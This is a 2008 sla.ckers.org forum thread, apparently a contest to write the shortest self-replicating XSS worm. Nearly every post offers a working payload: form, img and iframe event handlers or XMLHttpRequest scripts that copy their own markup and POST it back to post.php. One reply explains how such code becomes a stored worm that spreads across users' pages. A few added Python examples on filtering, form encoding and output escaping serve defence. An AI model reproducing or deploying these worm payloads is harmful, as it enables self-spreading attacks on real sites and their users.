Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 14 of 20
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 07:26AM

Yeah, still toying with other ideas as well:
<form><input name='content'><img src='' onerror="i=parentNode;i.action=(i.method='post')+'.php';i[0].value='<form>'+i.innerHTML;i.submit(alert('XSS'))">

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 08, 2008 08:02AM

This equals mario's:

<form><img src="" onerror="(f=parentNode)[0].value='<form>'+f.innerHTML;with(f)submit(alert('XSS',action=(method='post')+'.php'))"><input name="content">

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 08, 2008 08:06AM

<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))"

146 chars!!!




Edited 1 time(s). Last edit at 01/08/2008 08:16AM by Gareth Heyes.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 08:21AM

In case of the forms, I'm still pondering on how to simplify this tag:
<input name="content">
If it can be reduced, it would have a huge impact, I guess.

Other things that crossed my mind:
innerHTML.link() or .sub()
If we can, cram it all into a whole link?

Anyone had luck with:

<embed,frame,layer> ?

And of course the no-brainer:

this.onload = x();




Edited 1 time(s). Last edit at 01/08/2008 08:22AM by Ronald.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 08:22AM

@Gareth: Nice, but unfortunately both grow :-/

@Ronald: I played with most tags listed by the WASC Script Mapping Project - IFRAME IMHO is definitely the shortest way, due to the fact that no src is needed for onload. I also tried numerous ways to leave out the name="content" - or map it via JS, but no success yet... and the A-link() combo takes exactly the same space as B-bold() - damn :)



Edited 3 time(s). Last edit at 01/08/2008 08:27AM by .mario.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 08:28AM

Yeah, me too; usually the code grew instead. I had some clever solutions, but JS assignment made it bloat. .mario, the IMG is still the smallest et doctype compliant yet? (yours and mine(+1))

Or am I missing something? Since you'll need a closing tag on the iframe.

Edit: with link() I thought about just making a link, which should be shorter than .bold() if you can embed the code into the link; that's what I meant :) because you can assign more attributes to <a> than to <b>, like just having: href="js(); - just exploring the ideas.





Edited 2 time(s). Last edit at 01/08/2008 08:35AM by Ronald.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 08, 2008 08:29AM

This one doesn't :-

<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">


Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 08:47AM

Still my vote goes to the 'img', since 'iframes' can be blocked whereas images are usually not. And I also think about how some prevention methods work: maybe they scan for iframes, but who scans for images? Furthermore, if you look at MySpace-like sites, they could allow 'img' over 'iframe', thus giving it a far wider spectrum.

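An added example, written for this edit and not code from the thread or from PHPIDS, that puts Ronald's point into runnable form: a filter keyed on element names rejects the iframe-based shape but waves an img-based one through, while a check that looks at every element for on* attributes and javascript: URLs flags both. It uses Python's html.parser; the sample markup is constructed, with placeholder handler bodies rather than working payloads.

```python
from html.parser import HTMLParser

# Constructed samples modelled on the shapes discussed in this thread:
# an <iframe onload>, an <img onerror>, and an ordinary post.
SAMPLES = {
    "iframe_onload": '<form><input name="content"><iframe onload="f=parentNode"></iframe>',
    "img_onerror":   '<form><input name="content"><img src="" onerror="f=parentNode">',
    "benign":        '<p>Hello <a href="/profile">world</a> <img src="/a.png" alt="x"></p>',
}

# Element names a tag-only filter typically blocks (assumed list).
BLOCKED_TAGS = {"iframe", "script", "object", "embed", "frame", "layer"}

# Attributes whose value is loaded as a URL and may carry a javascript: scheme.
URL_ATTRS = {"href", "src", "action", "formaction"}


class _Scanner(HTMLParser):
    """Records what each element declares; html.parser lowercases names for us."""

    def __init__(self):
        super().__init__()
        self.tags = []         # element names seen, in document order
        self.handlers = []     # (tag, attribute) pairs that are on* event handlers
        self.script_urls = []  # (tag, attribute) pairs carrying javascript: URLs

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name))
            if name in URL_ATTRS and value and value.strip().lower().startswith("javascript:"):
                self.script_urls.append((tag, name))


def scan(markup):
    s = _Scanner()
    s.feed(markup)
    s.close()
    return s


def tag_blocklist_rejects(markup):
    """Naive filter that only looks at element names: blocks iframe, not img."""
    return any(t in BLOCKED_TAGS for t in scan(markup).tags)


def event_handler_rejects(markup):
    """Rejects any element carrying an on* attribute or a javascript: URL,
    whatever the element name."""
    s = scan(markup)
    return bool(s.handlers or s.script_urls)


def compare(samples=SAMPLES):
    """Return {name: (rejected_by_tag_blocklist, rejected_by_handler_check)}."""
    return {n: (tag_blocklist_rejects(m), event_handler_rejects(m)) for n, m in samples.items()}


if __name__ == "__main__":
    for name, (by_tag, by_handler) in compare().items():
        print(f"{name:14} tag blocklist: {by_tag!s:5}  event-handler check: {by_handler}")
```

Both checks are heuristics: browsers accept a great deal of malformed markup that a lenient parser may read differently, so this kind of scan belongs in monitoring (the PHPIDS role mentioned later in the thread). What actually stops a stored copy from executing is encoding or allowlist-sanitising the content when the page is rendered.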
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 08, 2008 09:14AM

@Ronald: Who scans for JavaScript?



Edited 1 time(s). Last edit at 01/08/2008 09:22AM by Spyware.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 09:20AM

@Gareth: It does - since the FORM tag isn't closed.

@Ronald:
Ronald Wrote:
-------------------------------------------------------
> the IMG is still the smallest et doctype compliant yet?

I think the IFRAME solution is valid since it utilizes slice to not grow, and I am pretty sure that valid markup is not a requirement - or is it? If yes, you were right with the IMG tag, I think. But I'm not sure...

@Spyware: PHPIDS scans for all malicious JS/HTML ;)

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 08, 2008 09:28AM

@mario

Damn it!


Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 09:57AM

@spyware,

Well, also think about a flawed BBCode parser here: since most allow images, it's then a matter of getting the event injected properly. All speculation of course; since I don't win either way, I'd like to cast my vote for the one that I started, the 'img' instead of the 'iframe' version (which I started also, btw).

Matter of preference, I figure; if someone can come up with something better, give it a go, I'd say. ;)

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 08, 2008 09:57AM

-Wait, I was being stupid all along ;x-



Edited 2 time(s). Last edit at 01/08/2008 10:21AM by Spyware.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 04:01PM

Not sure why we haven't used:
.cloneNode(1)
.cloneNode(1).innerHTML
.cloneNode(1,alert('xss')).innerHTML

yet.

Not because of .parentNode, but just because it could come in handy, maybe, since we can clone id spans with them.


Re: Diminutive XSS Worm Replication Contest
Posted by: badsamaritan
Date: January 08, 2008 04:02PM

<form method=post action=post.php><input name=content><input type=image onerror="(f=this.form).content.value=f.parentNode.innerHTML;alert('xss');f.submit()"src=></form>

-matt
http://badsamaritan.net

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 08, 2008 04:06PM

@badsamaritan

I deleted your other vector posted in the wrong thread, since this is the same.

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 08, 2008 06:49PM

<form id=_ method=post action=post.php><input name='content'><iframe onload=with(_)alert('XSS',submit(_[0].value=_.outerHTML))></form>

Meh, a crappy 134 :( and Firefox doesn't support outerHTML :( - so this vector is IE, Opera and Safari only.

Also hats off to sdc, shawn, ronald, mario, gareth, doctordan and all the others - you have certainly taught this rookie a thing or 2 (and to think I seriously thought my first submission was the shizznit).

Yes, I realise these worms don't meet the competition criteria, but at least we can see how small we can go when we target specific browsers.

EDIT: 111 bytes (IE only again)
<script id=_>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+_.outerHTML)</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 16 time(s). Last edit at 01/08/2008 08:33PM by digi7al64.

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 08, 2008 10:13PM

\0/ - 133 bytes - works with both Firefox and IE (I hope)
<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p id=_>'+_.innerHTML+'</p>')</script></p>


Re: Diminutive XSS Worm Replication Contest
Posted by: DoctorDan
Date: January 08, 2008 10:20PM

{<iframe onload="with(new XMLHttpRequest)open('POST','post.php'),send('content='+parentNode.innerHTML.match(/{.+\v/)),alert('XSS')">0x0B

133 bytes as well. Should work with IE and FF. The '0x0B' is just a representation of the vertical tab character in hex.

-Dan

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 08, 2008 10:27PM

@DoctorDan - I think your submission would fail the rules, as the { could already be used on the page... but in saying that, so could the _ which I use, so perhaps rsnake could clarify this point for us.


Re: Diminutive XSS Worm Replication Contest
Posted by: DoctorDan
Date: January 08, 2008 10:44PM

Alright, but that character can be easily changed to any uncommon character. I chose '{' just randomly, and anything will work in its place.

-Dan

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 12:11AM

Regarding XHR - It appears as though Firefox's support for adding the "Content-Type" header to the XHR request only began between versions 2.0.0.7 and 2.0.0.11 (the current version - which we have been testing with Apache today). Therefore, rsnake, are we expected to support these out-of-date browsers... which means adding the Content-Type header and essentially killing the use of XHR in this contest?




Edited 1 time(s). Last edit at 01/09/2008 12:16AM by digi7al64.

Re: Diminutive XSS Worm Replication Contest
Posted by: GlacialPhoenix
Date: January 09, 2008 12:45AM

I was just testing the two most recent submissions.
I run Apache/2.2.3 and I use Firefox/2.0.0.6

What I had to change:
- Added the content-type. This was completely required because Apache would not accept any POST content without it, and Firefox wouldn't automatically add it.
- The plus symbol had to be encoded. Otherwise, it would be converted to a space. I tried encode() but it didn't touch the plus symbol.

Both of these changes were completely required for the code to properly run.

Here is digi7al64's submission, modified:

<p/id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),setRequestHeader('Content-type','application/x-www-form-urlencoded'),send('content=<p/id=_>'+_.innerHTML.replace(/\+/g,"%2B")+'</p>')</script></p>

224 characters seems long, but at least it works with slightly older versions of FF and Apache.

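The `+` problem GlacialPhoenix hit comes from the request body being application/x-www-form-urlencoded, where a bare `+` means a space and a bare `&` starts a new field, so a value that is simply concatenated onto `content=` does not survive the server-side decode. An added example (mine, not code from the thread) that shows with Python's urllib.parse what a server-side decoder makes of a concatenated body versus a properly encoded one; the sample value is constructed.

```python
from urllib.parse import parse_qs, urlencode

# Constructed sample value containing the three characters a naive
# 'name=' + value concatenation mishandles in a form-urlencoded body.
SAMPLE_VALUE = "a+b c&d=e"


def naive_body(name, value):
    """Concatenate without encoding, as the thread's payloads do."""
    return name + "=" + value


def encoded_body(name, value):
    """Proper encoding: urlencode() uses quote_plus, so ' ' becomes '+',
    '+' becomes '%2B', and '&' / '=' are escaped so they cannot split or
    rename fields."""
    return urlencode({name: value})


def decode_body(body):
    """Decode the way a server-side framework (PHP's $_POST and friends) does:
    split on '&' and '=', turn '+' into a space, unescape %XX sequences."""
    return parse_qs(body, keep_blank_values=True)


def roundtrip(name, value, encode):
    """Return the value the server sees for `name` after sending it with `encode`."""
    fields = decode_body(encode(name, value))
    return fields.get(name, [None])[0]


if __name__ == "__main__":
    for enc in (naive_body, encoded_body):
        body = enc("content", SAMPLE_VALUE)
        print(f"{enc.__name__:13} body={body!r:32} decoded={decode_body(body)}")
```

The practical consequence for anyone inspecting a stored copy of such a submission: every `+` in the original JavaScript (string concatenation included) arrives as a space unless it was sent as `%2B`, and an unescaped `&` silently truncates the field and creates a new one. Note that the JS-side helper that does the equivalent of `urlencode` is `encodeURIComponent`; `encodeURI` leaves `+` and `&` untouched.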
Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 12:46AM

@digi7al64

I like your idea, but it's doctype dependent due to the _ id selector and therefore might not work everywhere,
so to be universal it requires at least some logic on whether to use only _ or document._

To be formal, it does not run -standalone- without a doctype/body that is, which violates at least one rule.

About the 'content type', that's a clever question; since every Firefox user is 'almost' updated automatically when a new version is available, I would say it's no problem, but that's up to RSnake.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 01:06AM

@GlacialPhoenix

Apache supports content negotiation by default since 1.x; that means for content-type as well as for type mapping, as well as other MIME types/headers. I have 4 different default instances of Apache running, from 1.x to the latest, and all negotiate properly without a content-type, since my hunch is that the browser already says it's a POST and therefore it will be treated like application/x-www-form-urlencoded by default. And since on your Apache instance the + symbol wasn't properly encoded, it means that you either have turned content negotiation off, or removed the mod_negotiation module, or it's broken. In other words, it sounds like an exotic issue.

Re: Diminutive XSS Worm Replication Contest
Posted by: GlacialPhoenix
Date: January 09, 2008 01:21AM

Ronald Wrote:
-------------------------------------------------------
> [...] it means that you either have
> turned content negotiation down, of removed the
> mod_negotiation module, or it's broken. In other
> words, sounds as an exotic issue.


Haven't touched it since I installed. I also double-checked that negotiation is installed. Just to be sure, I uploaded it to my Dreamhost account (Apache/2.0.61), attempted it again and got the same results. Although, I guess that it could still be considered an exotic issue. =/



Edited 1 time(s). Last edit at 01/09/2008 01:22AM by GlacialPhoenix.

Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 02:05AM

@Ronald - looking at the rule it states

6) must not use knowledge of the DOM unless you name a class or and id and use the class or id. No looking for the n-th script on the page as that will change from site to site.

Therefore my take is that you can use _.innerHTML which makes my code fine but then again 2 states

2) must self replicate the entire payload to a page called "post.php" as a parameter called "content" on the same domain (must be POSTed to that URL, no GETs please). We'll assume post.php will properly URL unescape your code.


Now, is that saying that if I modify my code to the following it will still fail, as (so I understand) there is no document object within the page when there are no html, head and body tags?

send('content=<p id=_>'+document.getElementById('_').innerHTML+'<p>')

Thus the concept of ids is useless unless we add all the relevant tags into the payload. Looks like I'm back to the drawing board :(


Re: Diminutive XSS Worm Replication Contest
Posted by: krazl
Date: January 09, 2008 03:06AM

Anyone please explain the implementation...

Correct me if I'm wrong.

1) Create a post.php file containing the above.
2) Open the post.php file.
3) Infinite loop!
4) Ctrl+Alt+Del > shut down browser.

I can't see any worm propagate itself... Any expert here, please explain... Thanks in advance.

I'm a noob,
krazl
http://www.krazl.com

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 03:53AM

@digi7al64 Aye, we never know whether the page has a proper DOM, or the page where it's sent to. post.php could be only a PHP script without a full DOM.

@krazl, well, it replicates itself to post.php, and then again, and again. For the sake of example this is how it's done and how worms can propagate themselves; in a real-world example we don't alert('xss') but rather inject it into a database to let it become a stored worm, that again, when someone opens his page, will inject the pages of his peers, and so on.

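What Ronald describes is decided entirely by how the receiving page handles `content`: if it echoes the stored value back verbatim, every view re-parses it as markup and the script re-submits itself; if it HTML-escapes the stored value for the element-body context, the same bytes are shown as text and the loop never starts. An added example (not code from the thread) of the two behaviours side by side using Python's html module; the stored sample and the page template are constructed and assumed.

```python
import html

# Constructed sample of a stored submission in the shape of the thread's
# XHR-based entries; the page template is an assumed minimal post view.
SAMPLE_CONTENT = "<p id=_><script>alert('xss')</script></p>"
PAGE = "<!doctype html><html><body><div class=post>{}</div></body></html>"


def render_unsafe(content):
    """Echo stored content verbatim: whatever was posted becomes live markup,
    so a self-posting script runs again on every view."""
    return PAGE.format(content)


def render_safe(content):
    """HTML-escape stored content before embedding it in an element body, so
    the browser shows the text of the submission but never parses it as markup.
    quote=True also escapes quotes, which matters if the same value is ever
    placed inside an attribute."""
    return PAGE.format(html.escape(content, quote=True))


def post_container(page):
    """Return what sits between the post container's open and close tags."""
    return page.split("<div class=post>", 1)[1].split("</div>", 1)[0]


def has_live_markup(page):
    """True if the container still holds an unescaped '<', i.e. the browser
    would parse tags there."""
    return "<" in post_container(page)


def displayed_text(page):
    """The text a reader would see in the container (entities decoded)."""
    return html.unescape(post_container(page))


if __name__ == "__main__":
    for render in (render_unsafe, render_safe):
        page = render(SAMPLE_CONTENT)
        print(f"{render.__name__:13} live markup: {has_live_markup(page)!s:5} "
              f"container={post_container(page)!r}")
```

Escaping for the element-body context is the right default for user content that is meant to be displayed as text. If the site is supposed to allow some markup (the MySpace-style case discussed earlier in the thread), the stored value instead has to go through an allowlist sanitiser that drops event-handler attributes and javascript: URLs, and a value placed inside an attribute or a script block needs that context's own encoder.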
Re: Diminutive XSS Worm Replication Contest
Posted by: digi7al64
Date: January 09, 2008 06:05AM

@doctordan - From a standalone point of view you have the same issues I did, in that you are assuming a parent node/DOM exists.

@ronald - Thanks for the feedback; it drove me to look at this from a slightly different angle whilst teaching me even more about how the DOM works.

FINAL SUBMISSIONS FOR ME

No Doc Type Issues - 140 byte XHR worm
<p><iframe onload="alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p>'+parentNode.innerHTML+'<p>')"></iframe><p>

Doc Type Issues - 131 byte XHR worm
<p id=_><script>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content=<p id=_>'+_.innerHTML+'<p>')</script><p>

Smallest XHR Internet Explorer worm - 111 bytes
<script id=_>alert('xss');with(new XMLHttpRequest)open('POST','post.php'),send('content='+_.outerHTML)</script>

